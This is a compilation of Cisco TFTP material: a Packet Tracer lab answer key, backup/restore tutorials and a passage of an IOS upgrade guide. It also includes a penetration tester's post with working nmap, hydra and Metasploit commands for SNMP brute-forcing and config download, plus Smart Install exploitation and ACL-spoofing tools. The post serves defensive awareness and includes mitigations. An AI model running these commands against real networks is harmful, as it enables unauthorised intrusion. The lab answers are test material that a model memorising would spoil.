10.7.6 Packet Tracer – Use a TFTP Server to Upgrade a Cisco IOS Image (Answers)

How to backup and restore router configuration via TFTP

Backing up hardware configuration is an important routine for network engineers: when hardware breaks down, you can recover the failed system within an acceptable time. One effective way to back up and restore configurations is to use TFTP to transfer them between remote hosts.

In the example below, I’ll show how to back up and restore configurations between a TFTP server and a Cisco router. The TFTP server will run the Cisco TFTP Server software.

Configure TFTP Server

  • Download Cisco TFTP Server from cisco.com (or an old version from here). Run the setup file to install the software on the computer that will act as the TFTP server (the computer connected to the Cisco router’s Ethernet port).
  • After installation, you’ll see a Cisco TFTP Server shortcut on the desktop.
  • Open Cisco TFTP Server. The window shown below means you have finished setting up the TFTP server. You must leave this window open to send or receive configurations with the router.
  • You can customize the TFTP server root directory (the directory that keeps the configuration files) by clicking View > Options on the menu bar.

Backup running configuration from a router to the TFTP Server

  • Connect a cable from the router to the TFTP server. Assign IP addresses on both and ensure that they can ping each other. In this example, the TFTP server has IP address 192.168.11.10 and the router is 192.168.11.1.
  • Connect to the router.
  • Type ‘copy running-config tftp:’ (without quotes).
  • Enter the IP address of the remote host (the TFTP server). In this example, it is 192.168.11.10.
  • Enter the destination filename to save the configuration to, or press Enter to accept the value in brackets [].
  • You’ll see that the file has been created and the status on the TFTP server is updated.
  • The file contains the running configuration of the router.

Restore startup configuration from a file on TFTP Server

  • Connect a cable from the router to the TFTP server. Assign IP addresses on both and ensure that they can ping each other. In this example, the TFTP server has IP address 192.168.11.10 and the router is 192.168.11.1.
  • Connect to the router.
  • Enter the IP address of the remote host (the TFTP server).
  • Enter the source filename to restore to the startup configuration.
  • The destination is startup-config.
  • The configuration file has now been restored to the startup configuration.

Summary

The example above shows only one common way to back up and restore configurations; there are other ways, such as FTP and HTTP, so try them and see which suits you best.

10.7.6 Packet Tracer – Use a TFTP Server to Upgrade a Cisco IOS Image (Instructor Version)

Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

10.7.6 Packet Tracer – Use a TFTP Server to Upgrade a Cisco IOS Image

Objectives

  • Part 1: Upgrade an IOS Image on a Cisco Device
  • Part 2: Backup an IOS Image on a TFTP Server

Scenario

A TFTP server can help manage the storage of IOS images and revisions to IOS images. For any network, it is good practice to keep a backup copy of the Cisco IOS Software image in case the system image in the router becomes corrupted or is accidentally erased. A TFTP server can also be used to store new IOS upgrades, which can then be deployed throughout the network where needed. In this activity, you will upgrade the IOS images on Cisco devices by using a TFTP server. You will also back up an IOS image with the use of a TFTP server.

Part 1: Upgrade an IOS Image on a Cisco Device

Step 1: Upgrade an IOS image on a router.

a. Access the TFTP server and enable the TFTP service.

Go to TFTP Server – tab Services – TFTP – tick On

Active TFTP service on Server – Packet Tracer

Which IOS images stored on the server are compatible with a 1941 router?

c1900-universalk9-mz.SPA.151-4.M4.bin and c1900-universalk9-mz.SPA.155-3.M4a.bin

c. From R2, issue the show flash: command and record the available flash memory.

R2#show flash:
System flash directory:
File  Length    Name/status
  3   33591768  c1900-universalk9-mz.SPA.151-4.M4.bin
  2   28282     sigdef-category.xml
  1   227537    sigdef-default.xml
[33847587 bytes used, 221896413 available, 255744000 total]
249856K bytes of processor board System flash (Read/Write)

d. Copy the CISCO1941/K9 IOS version 15.5 image for the 1941 router from the TFTP Server to R2.

Note: In an actual network, if there is more than one interface active on the router, you may need to enter the ip tftp source interface command to specify which interface should be used to contact the TFTP server. This command is not supported in PT 7.2 and older versions and is not necessary to complete this activity.

R2# copy tftp: flash:
Address or name of remote host []? 192.168.2.254
Source filename []? c1900-universalk9-mz.SPA.155-3.M4a.bin
Destination filename [c1900-universalk9-mz.SPA.155-3.M4a.bin]?
Accessing tftp://192.168.2.254/c1900-universalk9-mz.SPA.155-3.M4a.bin...
Loading c1900-universalk9-mz.SPA.155-3.M4a.bin from 192.168.2.254: !
[OK - 33591768 bytes]
33591768 bytes copied in 4.099 secs (860453 bytes/sec)

e. Verify that the IOS image has been copied to flash.

How many IOS images are located in flash?

R2#show flash:
System flash directory:
File  Length    Name/status
  3   33591768  c1900-universalk9-mz.SPA.151-4.M4.bin
  5   33591768  c1900-universalk9-mz.SPA.155-3.M4a.bin
  2   28282     sigdef-category.xml
  1   227537    sigdef-default.xml
[67439355 bytes used, 188304645 available, 255744000 total]
249856K bytes of processor board System flash (Read/Write)

f. Use the boot system command to load the version 15.5 IPBase image on the next reload.

R2(config)# boot system flash c1900-universalk9-mz.SPA.155-3.M4a.bin

g. Save the configuration and reload R2.

R2#copy running-config startup-config
R2#reload

h. Use the show version command to verify that the upgraded IOS image is loaded after R2 reboots.

R2# show version
Cisco IOS Software, C1900 Software (C1900-UNIVERSALK9-M), Version 15.5(3)M4a, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2016 by Cisco Systems, Inc.
Compiled Thu 06-Oct-16 13:56 by mnguyen

ROM: System Bootstrap, Version 15.0(1r)M9, RELEASE SOFTWARE (fc1)

R2 uptime is 21 seconds
System returned to ROM by power-on
System image file is "flash0:c1900-universalk9-mz.SPA.155-3.M4a.bin"
<output omitted>

Step 2: Upgrade an IOS image on a switch.

a. Access the TFTP server and copy the c2960-lanbasek9-mz.150-2.SE4.bin image to S1.

S1#copy tftp: flash:
Address or name of remote host []? 192.168.2.254
Source filename []? c2960-lanbasek9-mz.150-2.SE4.bin
Destination filename [c2960-lanbasek9-mz.150-2.SE4.bin]?
Accessing tftp://192.168.2.254/c2960-lanbasek9-mz.150-2.SE4.bin...
Loading c2960-lanbasek9-mz.150-2.SE4.bin from 192.168.2.254: !
[OK - 4670455 bytes]
4670455 bytes copied in 3.08 secs (121911 bytes/sec)
S1#

b. Use the boot system command to configure the switch to load the new IOS image on boot.

S1(config)#boot system flash0:c2960-lanbasek9-mz.150-2.SE4.bin

c. Reload S1 and verify the new image has been loaded into memory.

S1#copy running-config startup-config
S1#reload

d. Close the TFTP configuration window if it is still open.

Part 2: Backup an IOS Image to a TFTP Server

a. On R1, display the contents of flash and record the IOS image.

R1#show flash:
System flash directory:
File  Length     Name/status
  3   486899872  isr4300-universalk9.03.16.05.S.155-3.S5-ext.SPA.bin
  2   28282      sigdef-category.xml
  1   227537     sigdef-default.xml
[487155691 bytes used, 2761893909 available, 3249049600 total]
3.17338e06K bytes of processor board System flash (Read/Write)

b. Use the copy command to back up the IOS image in flash memory on R1 to a TFTP server. Note: The isr4300 image is considerably larger than the c1900 image, so it will take longer to transmit to the TFTP server.

R1# copy flash: tftp:
Source filename []? isr4300-universalk9.03.16.05.S.155-3.S5-ext.SPA.bin
Address or name of remote host []? 192.168.2.254
Destination filename [isr4300-universalk9.03.16.05.S.155-3.S5-ext.SPA.bin]?
Writing isr4300-universalk9.03.16.05.S.155-3.S5-ext.SPA.bin...
<output omitted>
[OK - 486899872 bytes]
486899872 bytes copied in 18.815 secs (83367 bytes/sec)

c. Access the TFTP server and verify that the IOS image has been copied to the TFTP server. Note: You may have to start and stop the TFTP service on the server so the file appears in the file listing.

Cisco Hackery: How Cisco Configuration Files Can Help Attackers Enumerate Your Network

Prior to making a career change to offensive security, I spent over 15 years working for a Cisco partner designing and implementing enterprise and VoIP networks. During that time, I performed best practice assessments aimed at identifying misconfigurations that could lead to a network compromise. Today, I have taken that knowledge and used it to demonstrate how to compromise networks so that I can help clients strengthen their security posture.


During the reconnaissance phase of a penetration test, I typically look for an exposed TFTP, SNMP, and Cisco Smart Install (SMI) service on a network. Each one of these services provides an avenue to exploit a misconfiguration to download a Cisco configuration file.

Cisco configuration files can provide a wealth of knowledge for an attacker. Not only do configuration files provide information regarding the device, but they also provide additional avenues for further enumeration and possible lateral movement, such as physical and logical neighbor relations, password reuse, user enumeration, and applied access control lists (ACL).

2.0 Configuration File Download

2.1 TFTP

After identifying a TFTP server during the reconnaissance phase, I will rescan the exposed TFTP server port utilizing Nmap with the tftp-enum.nse script. Since TFTP does not provide a directory listing, the NSE script performs basic enumeration of common Cisco configuration file names.

nmap -sU -p69 --script tftp-enum.nse [XXX.XXX.XXX.XXX]

If Nmap successfully enumerates a file name, I will use a TFTP client to attach to the device and issue a get request with the enumerated file name.

2.1.1 TFTP Mitigation

To aid in securing file uploads and downloads to a Cisco device, consider utilizing Secure Copy Protocol (SCP). SCP utilizes Secure Shell (SSH) to securely transfer data over the network. In addition, SCP can be configured to use authentication, authorization, and accounting (AAA) on the Cisco device. This combination can be further configured to specify which users are authorized to copy files.

aaa new-model
aaa authentication login default local
aaa authorization exec default local
ip ssh time-out 120
ip ssh authentication-retries 3
ip scp server enable

However, if business reasons prevent implementing SCP, consider applying an ACL to help secure which IP Address is permitted to connect to the Cisco TFTP server.

no access-list 3
access-list 3 remark TFTP Remote Access
access-list 3 permit host [XXX.XXX.XXX.XXX]
access-list 3 deny any log
tftp-server nvram:startup-config 3

2.2 SNMP

SNMP is another protocol that can be leveraged to upload or download a Cisco configuration file. However, the Read/Write SNMP community string must be known to upload or download the configuration file using SNMPv1 or SNMPv2c. For SNMPv3 configured Cisco devices, user credentials and membership to an SNMP Read/Write Group must be configured to upload or download a configuration file.

2.2.1 SNMP Observations

An interesting observation I made while researching SNMP is that Nmap returned the results as SNMPv3 even if SNMPv1 or SNMPv2c was configured on a Cisco device. However, if the community string is identified, Nmap properly enumerates the version of SNMP configured on the Cisco device.

From my understanding, Cisco’s SNMP uses the same MIB for each supported version of SNMP. The main difference between version 2 and version 3 is the security features. Unfortunately, I was not able to obtain a definitive answer as to why Nmap fingerprints SNMP on Cisco devices as SNMPv3 when a lesser version of SNMP is configured.

2.2.2 SNMP Brute-Force Guessing

Since SNMPv3 is identified from tools like Nmap and Nessus, I use two different methods of brute-forcing. The first method is using the community string for SNMPv1/2c, and the second method is user enumeration and password guessing for SNMPv3.

2.2.2.1 SNMPv1 and SNMPv2c

For brute-force guessing an SNMPv1 and SNMPv2c community string, there are multiple tools to get the job done. The following are just a few that I might use during an engagement.

nmap -Pn -sUV -p 161 [XXX.XXX.XXX.XXX] --script snmp-brute
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt [XXX.XXX.XXX.XXX] snmp

Example Metasploit Configuration and Execution:

use auxiliary/scanner/snmp/snmp_login
set RHOSTS [XXX.XXX.XXX.XXX]
run

2.2.2.2 SNMPv3

For SNMPv3 brute forcing, I use snmpwn in two stages. The first stage is user enumeration, when I leverage similar techniques that I use to enumerate users from Active Directory or a web login portal. However, snmpwn does require a password list or an encrypted password list while performing enumeration, which technically is a password guessing attack. So, I use a single password within both lists to help eliminate possible user account lockout.

Once I have successfully enumerated a username, I then move to password guessing. This time, I use a single common password (e.g. MonthYear) for both the password and encrypted password to avoid a user account lockout.

2.2.3 SNMP File Download

Just like brute-forcing was different for the Cisco versions of SNMP, so is SNMP file download. For SNMPv1 and SNMPv2c, I like to leverage the Metasploit cisco_config_tftp module. For SNMPv3, I was not able to find a public application that would download a Cisco configuration file, so I created config-dump to help automate the process.

2.2.3.1 SNMPv1 and SNMPv2c

The Metasploit cisco_config_tftp module includes automation for starting/stopping the TFTP server. The following is an example of configuring and executing the module:

use auxiliary/scanner/snmp/cisco_config_tftp
set RHOSTS [XXX.XXX.XXX.XXX]
set Community [private]
set OUTPUTDIR [/tmp]
run

2.2.3.2 SNMPv3

Utilizing config-dump requires a separate TFTP server, so I usually use a Python3 TFTP server. At a minimum, config-dump requires the target, TFTP server, authentication protocol, authentication protocol password, username, and password. Depending on the SNMPv3 device configuration, snmpwn might require the protocol and protocol password, which will then need to be included when executing config-dump.

Example config-dump execution:

python3 config-dump.py -t [XXX.XXX.XXX.XXX] -a SHA -A [Password] -x AES -X [Password] -u [username] -s [XXX.XXX.XXX.XXX]

List of config-dump flags:
-t: SNMPv3 Target
-a: Authentication Protocol (MD5 or SHA)
-A: Authentication Protocol Password
-x: Protocol (DES or AES)
-X: Protocol Password
-u: Username
-s: TFTP Server

2.2.4 Mitigation

The best method to secure SNMPv1 and SNMPv2c on a Cisco device is to implement SNMPv3 with an ACL. If business reasons prevent implementing SNMPv3, consider applying an ACL to help secure the IP Address that is permitted to connect to the configured SNMP server.

2.2.4.1 SNMPv1 and SNMPv2 ACL

no access-list 1
access-list 1 remark [SNMP Remote Access]
access-list 1 permit host [XXX.XXX.XXX.XXX]
access-list 1 deny any log

Example ACL applied to the SNMP server community:

snmp-server community [private] RW 1
snmp-server community [public] RO 1

2.2.4.2 SNMPv3 ACL

When applying the ACL to SNMPv3, be sure that the ACL is applied to both the SNMP Server group and user. During my testing, I was able to download the Cisco device configuration file when the ACL was only applied to SNMP Server user or group.

no access-list 1
access-list 1 remark [SNMP Remote Access]
access-list 1 permit host [XXX.XXX.XXX.XXX]
access-list 1 deny any log

Example ACL applied to both the SNMPv3 server group and user:

snmp-server group snmp-ro v3 priv read [SNMPv3View] access 1
snmp-server group snmp-rw v3 priv write [SNMPv3View] access 1
snmp-server user [secret] snmp-rw v3 auth md5 [Password] priv 3des [Password] access 1

2.2.5 SNMPv1 and SNMPv2c Bypass

With SNMPv1 and SNMPv2 securely configured by utilizing a complex community string and an applied ACL, it is possible to bypass security measures to download a Cisco configuration file. Cisco-SNMP-Slap can be leveraged to spoof an IP Address in an ACL which is permitted to download the Cisco configuration file.

Cisco-SNMP-Slap does require knowledge of the network and the targeted Cisco device. For instance, knowing the community string as well as the permitted IP Address range within the ACL is key for a successful spoofing attack. In addition, a TFTP server is required for downloading the configuration file.

2.3 SMI

Cisco SMI is a Plug-and-Play feature that provides Zero-Touch deployment for Cisco switches and communicates on TCP port 4786. When this feature was first introduced it could not be disabled, which made it vulnerable to Remote Code Execution (RCE). However, on May 23, 2018 Cisco downgraded the security advisory status to Informational and explained that it was protocol misuse.

Nessus modified its vulnerability rating of this finding to Informational and documented that there was no risk factor. However, the Cisco device that Nessus scanned was, in fact, vulnerable to the RCE, which was exploited during a penetration test that I performed in the summer of 2022.

2.3.1 SMI Vulnerability Discovery

Once initial reconnaissance has identified that TCP port 4786 is open, I rescan the port with Nmap and leverage the cisco-siet.nse script to identify whether the vulnerable RCE is present on the Cisco device.

nmap [XXX.XXX.XXX.XXX] -p 4786 --script cisco-siet.nse

2.3.2 SMI Vulnerability Exploitation

For vulnerability exploitation, I use one of two scripts depending on the engagement type. If I am performing a penetration test and just want to download the configuration file, I use Cisco SmartInstall Exploit. If I have client permission to modify the device, I will leverage SIET to gain a foothold and then laterally move across the network.

For OPSEC considerations, keep in mind that a device with an IOS version prior to 15.2(2)E will require a reboot if utilizing SIET to modify the Cisco IOS configuration file.

2.3.3 SMI Mitigation

The easiest way to mitigate Cisco SMI is by turning it off if it is not in use.

However, if there is a business reason that SMI cannot be disabled, create and apply an inbound ACL to limit the IP Address permitted to access this service.

Create an Access Control List (ACL):

ip access-list extended SMI_HARDENING_LIST
 permit tcp host [XXX.XXX.XXX.XXX] host [XXX.XXX.XXX.XXX] eq 4786
 deny tcp any any eq 4786
 permit ip any any

Apply the inbound ACL to all interfaces:

ip access-group SMI_HARDENING_LIST in

3.0 Configuration File

After downloading the configuration file from the Cisco device, I review the contents to determine whether I can connect to the device to establish a foothold. In addition, I review the SNMP configuration to determine whether I can leverage it to download additional Cisco device configuration files. Lastly, I review the configuration for any details that aid in further enumerating the network.

3.1 Establish a Foothold

When attempting to establish a foothold, I check the VTY Port configuration to determine connectivity type as well as an applied ACL. In Figure 16, the VTY ports accept a local login via Telnet or SSH and there is not an applied ACL.

Next, I review the configured usernames and the configured hashed passwords for possible password recovery. I also make a note for those usernames that do not appear to be shared, like admin and enable, for possible user enumeration against other platforms, such as Active Directory. For those shared usernames, these typically have the same password configured on multiple Cisco devices.

After recovering a password, I use the configured IP Address to connect to the Cisco device and establish a foothold.

3.2 Configuration Download

Whether I am successful in establishing a foothold or not, I always review the SNMP configuration for additional attack paths. Reviewing Figure 18, there are both the SNMP Read and Read/Write community strings in plaintext. These can be leveraged to perform SNMP brute-force guessing against other exposed SNMP services. In addition, there is a configured SNMP ACL, but it was not applied to either community string. Within the ACL, there is an IP Address that is permitted to access the SNMP server. If the SNMP ACL was applied to other Cisco devices, Cisco-SNMP-Slap could be leveraged with the IP Address to bypass an applied SNMP ACL and download the configuration file.
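The review in sections 3.1 and 3.2 can be turned into a defender-side check against the mitigations in 2.1.1, 2.2.4.1 and 2.2.4.2. The following is an added Python example, not part of the original post: it scans a running-config for community strings without an ACL, an SNMPv3 group or user without an `access` ACL, a `tftp-server` line without an ACL, and VTY lines with no `access-class`. The sample config, hostnames and ACL numbers are constructed.

```python
import re
from typing import List

# Constructed sample running-config (not taken from any real device). It shows
# the weaknesses discussed above: SNMP community strings with no ACL, an SNMPv3
# user missing the ACL its group has, an unrestricted tftp-server line, and a
# VTY range with no access-class that still accepts Telnet. (On real IOS the
# snmp-server user line is shown by 'show snmp user' rather than in the
# running-config; it is included here so the check can be exercised.)
SAMPLE_CONFIG = """\
hostname SW-CORE
!
snmp-server community public RO
snmp-server community private RW
snmp-server group snmp-rw v3 priv write SNMPv3View access 1
snmp-server user netops snmp-rw v3 auth sha Pa55w0rd priv aes 128 Pa55w0rd
access-list 1 remark SNMP Remote Access
access-list 1 permit host 192.168.11.10
access-list 1 deny any log
tftp-server nvram:startup-config
!
line vty 0 4
 login local
 transport input telnet ssh
!
line vty 5 15
 access-class 10 in
 login local
 transport input ssh
!
end
"""

# snmp-server community <string> [view <name>] RO|RW [<acl>]
COMMUNITY_RE = re.compile(
    r"^snmp-server community (\S+)(?:\s+view\s+\S+)?\s+(RO|RW)(?:\s+(\S+))?\s*$", re.I)
# snmp-server group <name> v3 noauth|auth|priv [views...] [access <acl>]
GROUP_RE = re.compile(r"^snmp-server group (\S+) v3 (?:noauth|auth|priv)\b(.*)$")
# snmp-server user <name> <group> v3 [auth ...] [priv ...] [access <acl>]
USER_RE = re.compile(r"^snmp-server user (\S+) (\S+) v3\b(.*)$")
# tftp-server <file> [alias <name>] [<acl>]
TFTP_RE = re.compile(r"^tftp-server (\S+)(?:\s+alias\s+\S+)?(?:\s+(\S+))?\s*$")


def has_access_acl(rest: str) -> bool:
    """True when an 'access <acl>' keyword is present in the tail of a line."""
    return re.search(r"\baccess\s+\S+", rest) is not None


def audit_config(config: str) -> List[str]:
    """Return one finding per weak line; an empty list means nothing was flagged."""
    findings: List[str] = []
    lines = config.splitlines()
    i = 0
    while i < len(lines):
        line = lines[i].rstrip()
        if line.startswith("line vty"):
            # Lines indented by a space belong to the 'line vty' block.
            block = []
            j = i + 1
            while j < len(lines) and lines[j].startswith(" "):
                block.append(lines[j].strip())
                j += 1
            if not any(b.startswith("access-class") for b in block):
                findings.append(f"{line}: no access-class applied")
            for b in block:
                if b.startswith("transport input") and (" telnet" in b or b.endswith(" all")):
                    findings.append(f"{line}: transport input permits Telnet")
            i = j
            continue
        if (m := COMMUNITY_RE.match(line)) and m.group(3) is None:
            findings.append(f"snmp-server community '{m.group(1)}' ({m.group(2).upper()}) has no ACL")
        elif (m := GROUP_RE.match(line)) and not has_access_acl(m.group(2)):
            findings.append(f"snmp-server group '{m.group(1)}' has no access ACL")
        elif (m := USER_RE.match(line)) and not has_access_acl(m.group(3)):
            findings.append(
                f"snmp-server user '{m.group(1)}' (group {m.group(2)}) has no access ACL; "
                "apply it to both the group and the user")
        elif (m := TFTP_RE.match(line)) and m.group(2) is None:
            findings.append(f"tftp-server {m.group(1)} has no ACL")
        i += 1
    return findings


if __name__ == "__main__":
    for finding in audit_config(SAMPLE_CONFIG):
        print(finding)
```

Run against a saved `show running-config` the checker flags only the six weaknesses in the sample; the same config with ACLs applied to every community, the user, the tftp-server line and the VTY range produces no findings.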

3.3 Network Enumeration

I review static and dynamic routes as well as configured VLANs and port descriptions to better understand the network environment. In Figure 19, there is a single default static route and no dynamic routing. Vlan254 appears to be the only routed subnet configured on the device. For the other configured VLANs, it would appear that they could be isolated networks, but more enumeration would be required for confirmation.

Taking a closer look at the port descriptions in Figure 20, the Cisco device appears to have a wireless access point connected on the first Ethernet interface. In addition, the port descriptions for Ethernet ports 0/2 and 0/3 suggest that a VoIP phone system is configured on the network.

4.0 Conclusion

As I briefly demonstrated, obtaining a Cisco configuration file could provide an attacker the information required to establish a foothold and laterally move across a network. I am hopeful that the information shared makes both network administrators and security professionals aware of these misconfigurations and provides a reference for further improving the security of Cisco networks.

How To Backup and Restore Cisco Switch/Router Configuration Files Using TFTP Server

Backing up and restoring Cisco router/switch configuration files using TFTP is one of the topics of the CCNA certification exam. In this guide, you will learn how to back up and recover Cisco switch/router configurations using a TFTP server. These procedures are easy and require a few straightforward steps. But first, let’s take a look at how TFTP works.

What is TFTP and How Does it Work?

TFTP stands for Trivial File Transfer Protocol. It is a pretty simple file transfer protocol that is used to share files through a network.

TFTP uses UDP as its Layer 4 protocol and port 69 to initiate file transfer requests. Unlike FTP, TFTP does not support authentication.

TFTP client and server exchange files using ephemeral port numbers, ranging from 1024 to 65535. Both the client and server independently choose the UDP port to transfer data during the negotiation of the transfer request.

TFTP uses five packet types:

  • Read request (RRQ)
  • Write request (WRQ)
  • Data (DATA)
  • Acknowledgment (ACK)
  • Error (ERROR)

Here are the steps a TFTP connection goes through when downloading a file from a TFTP server to a TFTP client:

Step 1. The client initiates a read request by sending an RRQ packet to the server at port number 69. The request includes a filename and a transfer mode.


Step 2. The server acknowledges the RRQ packet with a DATA packet that is sent from a random UDP port number in the range 1024 to 65535. The client sends its subsequent TFTP packets to that port rather than to port 69.

Step 3. The server starts sending numbered DATA packets to the destination host. Each data packet, except the last one, has a unique sequence number and includes a full-sized block of data.

Step 4. The client confirms the reception of each DATA packet using a numbered ACK packet. The server confirms the reception of the ACK for one data block by sending the DATA packet of the next block.

Step 5. If an ACK for a DATA packet is not received before the server’s retransmit timer expires, the server resends that DATA packet.

Step 6. The server signals the end of the file transfer by sending a DATA packet whose payload is smaller than the full block size, possibly 0 bytes. If the file size is not a multiple of a full-sized block, the last DATA packet carries the remainder; otherwise it carries 0 bytes.

When uploading a file to a TFTP server, the client and the server go through similar steps, except that the client uses a WRQ packet to initiate the file transfer session.
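The exchange in steps 1 to 6 above, as an added Python example that is not part of the original tutorial: encoders and a decoder for the five packet types, and an in-memory download that shows the short-last-block rule from step 6, the 0-byte final block for a file that is an exact multiple of 512 bytes, and the ERROR reply for a missing file. The file names and contents are constructed; the 1089-byte sample matches the size of the SW1 backup shown later in the tutorial.

```python
import struct
from typing import Dict, List, Optional, Tuple

BLOCK_SIZE = 512                              # fixed TFTP data block size (RFC 1350)
RRQ, WRQ, DATA, ACK, ERROR = 1, 2, 3, 4, 5    # the five opcodes listed above


def build_request(opcode: int, filename: str, mode: str = "octet") -> bytes:
    """RRQ/WRQ: 2-byte opcode, filename, NUL, transfer mode, NUL."""
    return struct.pack("!H", opcode) + filename.encode() + b"\0" + mode.encode() + b"\0"


def build_data(block: int, payload: bytes) -> bytes:
    """DATA: opcode 3, 16-bit block number, 0..512 bytes of data.

    Block numbers wrap at 65535, which happens for images above 32 MiB such as
    the 33 MB c1900 image copied in the Packet Tracer lab."""
    return struct.pack("!HH", DATA, block & 0xFFFF) + payload


def build_ack(block: int) -> bytes:
    """ACK: opcode 4, block number being acknowledged."""
    return struct.pack("!HH", ACK, block & 0xFFFF)


def build_error(code: int, message: str) -> bytes:
    """ERROR: opcode 5, error code, NUL-terminated message (code 1 = file not found)."""
    return struct.pack("!HH", ERROR, code) + message.encode() + b"\0"


def parse(packet: bytes) -> dict:
    """Decode any of the five packet types into a dict keyed by field name."""
    (opcode,) = struct.unpack("!H", packet[:2])
    if opcode in (RRQ, WRQ):
        filename, mode, _ = packet[2:].split(b"\0", 2)
        return {"op": opcode, "filename": filename.decode(), "mode": mode.decode()}
    if opcode == DATA:
        (block,) = struct.unpack("!H", packet[2:4])
        return {"op": DATA, "block": block, "data": packet[4:]}
    if opcode == ACK:
        (block,) = struct.unpack("!H", packet[2:4])
        return {"op": ACK, "block": block}
    if opcode == ERROR:
        (code,) = struct.unpack("!H", packet[2:4])
        return {"op": ERROR, "code": code, "message": packet[4:].split(b"\0", 1)[0].decode()}
    raise ValueError(f"unknown TFTP opcode {opcode}")


def simulate_read(server_files: Dict[str, bytes], filename: str
                  ) -> Tuple[List[Tuple[str, dict]], Optional[bytes]]:
    """Play one RRQ download in memory and return (transcript, received bytes).

    Each transcript entry is (sender, parsed packet). The transfer ends on the
    first DATA packet shorter than BLOCK_SIZE, which is a 0-byte block when the
    file length is an exact multiple of 512 (step 6 above)."""
    transcript = [("client", parse(build_request(RRQ, filename)))]     # step 1
    if filename not in server_files:
        transcript.append(("server", parse(build_error(1, "File not found"))))
        return transcript, None
    data, received, block = server_files[filename], bytearray(), 0
    while True:
        block += 1
        chunk = data[(block - 1) * BLOCK_SIZE: block * BLOCK_SIZE]      # step 3
        pkt = parse(build_data(block, chunk))
        transcript.append(("server", pkt))
        received += pkt["data"]
        transcript.append(("client", parse(build_ack(pkt["block"]))))   # step 4
        if len(chunk) < BLOCK_SIZE:                                      # step 6
            return transcript, bytes(received)


if __name__ == "__main__":
    # Constructed 1089-byte "config" served under the name used later in the tutorial.
    files = {"SW1-running-config.cfg": b"!\n" * 544 + b"e"}
    transcript, received = simulate_read(files, "SW1-running-config.cfg")
    for sender, pkt in transcript:
        print(f"{sender:>6}: {pkt}")
    print(f"received {len(received)} bytes in {len(transcript) // 2} data blocks")
```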

In the rest of this tutorial, I will be using the following network diagram. The network consists of three devices: a Cisco router, a Cisco Switch, and a TFTP server. You can get and install a free TFTP server app from this link.

How To Backup Cisco Router/Switch Configuration Files Using a TFTP Server

Backing up a Cisco router/switch configuration file is a straightforward procedure; here are the steps to follow:

Step 1. Configure a TFTP server. There are several free TFTP software online like Tftpd64 and 3Com Daemon.

Step 2. Connect the Cisco router/switch to the computer hosting the TFTP server app.

Step 3. Configure IP addresses on both the router/switch and the TFTP server.

Switch>enable
Switch# conf t
Switch(config)# hostname SW1
SW1(config)# interface vlan 1
SW1(config-if)# ip address 172.16.0.2 255.255.255.0
SW1(config-if)# no shutdown

Step 4. Ping the TFTP server from the router/switch to ensure both devices can connect.

SW1# ping 172.16.0.10
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 172.16.0.10, timeout is 2 seconds:
Success rate is 100 percent (5/5), round-trip min/avg/max = 0/0/0 ms

Step 5. Access the Cisco router/switch’s CLI via a console cable, Telnet, or SSH.

Step 6. In enable mode, issue the copy startup-config tftp: command or the copy running-config tftp: command to backup the startup configuration file or the running configuration file, respectively. Both commands would prompt you for a name under which to store the configuration file on the TFTP server, and the IP address of the TFTP server.

In this example, we save SW1’s running configuration file using the name “SW1-running-config.cfg” to the TFTP server with IP address 172.16.0.10.

SW1# copy running-config tftp:
Address or name of remote host []? 172.16.0.10
Destination filename [SW1-confg]? SW1-running-config.cfg
Writing running-config...
[OK - 1089 bytes]
1089 bytes copied in 0 secs

Step 8. Open the folder where the TFTP server stores files to check that a copy of the configuration file is there. If you are using Packet Tracer, click the icon of the TFTP server, open the services tab, and then click TFTP in the Services section. You will get a screen like this.

How To Restore Cisco Router/Switch Configuration Files from a TFTP Server

Restoring a configuration file from a TFTP server is similar to backing one up to a TFTP server. Here are the steps to restore a Cisco router/switch configuration file (startup/running configuration):

Step 1. Set up a TFTP server.

Step 2. Connect the Cisco router/switch directly or through another network device to the TFTP server.

Step 3. Configure IP addresses on both the router/switch and the TFTP server.

Router>enable
Router# conf t
Router(config)# hostname R1
R1(config)# interface gigabitEthernet 0/0
R1(config-if)# ip address 172.16.0.1 255.255.255.0
R1(config-if)# no shutdown

Step 4. Ping the TFTP server from the router/switch to make sure both devices can connect.

R1# ping 172.16.0.10
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 172.16.0.10, timeout is 2 seconds:
Success rate is 100 percent (5/5), round-trip min/avg/max = 0/0/0 ms

Step 5. Connect to the Cisco router/switch’s CLI via a console cable, Telnet, or SSH.

Step 6. In privileged EXEC mode, issue the copy tftp: startup-config command or the copy tftp: running-config command to recover the startup configuration file or the running configuration file, respectively. Both commands would ask you to supply the name of the source file that will be used to replace the content of the chosen configuration file, confirm the name of the configuration file to restore, and enter the IP address of the TFTP server.

R1# copy tftp: startup-config
Address or name of remote host []? 172.16.0.10
Source filename []? R1-running-config.txt
Destination filename [startup-config]?    ! press the Enter key
Accessing tftp://172.16.0.10/R1-running-config.txt...
Loading R1-running-config.txt from 172.16.0.10: !
[OK - 18057 bytes]
18057 bytes copied in 1 secs

Step 8. Using the more command, display the current content of the recovered file. Also, review all lines that are starting with “AAA” to make sure that authentication is properly configured so that you don’t risk being locked out of the router/switch.

Backup and Restore Cisco Switch/Router Configuration Files Using a TFTP Server in Packet Tracer

Here is a Packet Tracer lab file that you can download to practice the Cisco IOS commands used to back up and restore Cisco switch/router configurations using a TFTP server.

Troubleshooting Backing up and Restoring Cisco Router/Switch Configurations Using a TFTP Server

The backup process may fail because of one of these reasons:

  • The TFTP service is down
  • The TFTP server is unreachable because of bad IP addressing on the client or the server, or due to routing issues in the network.
  • Incorrect or nonexistent source/destination file name.
  • An ACL is blocking TFTP traffic between the client and the server.

Conclusion

I hope this blog post helps you learn something. Now I’d like to turn it over to you: What did you like about this tutorial? Or maybe you have an excellent idea that you think I need to add. Either way, let me know by leaving a comment below right now.

How to upgrade Cisco iOS Image

Cisco IOS devices typically use their flash memory to store the IOS image. On most routers, this flash memory can be easily replaced. On some switches, it is integrated into the device and can’t be replaced.

In this lesson, I’ll show you several options for copying a new IOS image to your Cisco IOS router or switch. I will use a Cisco 2800 IOS router in these examples.

First, head over to Cisco.com Support Download and grab the iOS image that you want. For example:

If you hover your mouse over the filename, you will see some extra information:

Above you can see the file name and MD5 checksum. The checksum can be used to check if the file that you downloaded is the same or has changed. I’ll show you this later.

